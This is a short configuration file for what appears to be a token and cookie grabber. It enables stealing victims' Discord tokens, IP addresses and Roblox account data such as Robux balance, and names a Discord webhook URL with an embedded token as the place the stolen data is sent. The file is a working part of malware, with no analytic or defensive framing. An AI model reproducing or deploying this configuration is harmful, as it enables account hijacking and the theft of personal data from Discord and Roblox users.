 discord_invite_ logger_ settings:
  grab minecraft log info: false
  grab ip address: true
  grab discord token: true

webhook_settings:
 webhook: "https://discord.com/api/webhooks/1004476904314773615/ZJPxl3FVGlIazxr-1mWYlVjMWf4kepi8XCFeOu-YXSXV03DwGNKvgCE3HDWf5ITjBGED"

roblox_ cookie_ logger_ settings:
  grab robux balance: true
  grab ip address: false
  grab summary: true
  grab username: false
